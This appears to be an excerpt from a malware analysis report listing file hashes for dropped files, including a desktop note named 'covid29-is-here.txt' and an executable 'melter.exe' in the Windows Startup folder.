| MD5 | 8bcd083e16af6c15e14520d5a0bd7e6a |
| SHA1 | c4d2f35d1fdb295db887f31bbc9237ac9263d782 |
| SHA256 | b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a |
| SHA512 | 35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a |
C:\Users\Admin\Desktop\covid29-is-here.txt
| MD5 | c53dee51c26d1d759667c25918d3ed10 |
| SHA1 | da194c2de15b232811ba9d43a46194d9729507f0 |
| SHA256 | dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52 |
| SHA512 | da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\melter.exe
| MD5 | 33b75bd8dbb430e95c70d0265eeb911f |
| SHA1 | 5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83 |
| SHA256 | 2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12 |
| SHA512 | 943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936 |